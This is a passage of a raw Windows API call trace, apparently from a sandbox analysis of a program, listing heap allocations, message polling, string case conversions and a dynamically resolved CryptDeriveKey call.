dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.161] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.161] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.162] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.162] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.162] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa8e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.166] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0209.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0209.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0209.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0209.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.167] CryptDeriveKey (in: hProv=0xad2a50, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57e0) returned 1 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0209.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: 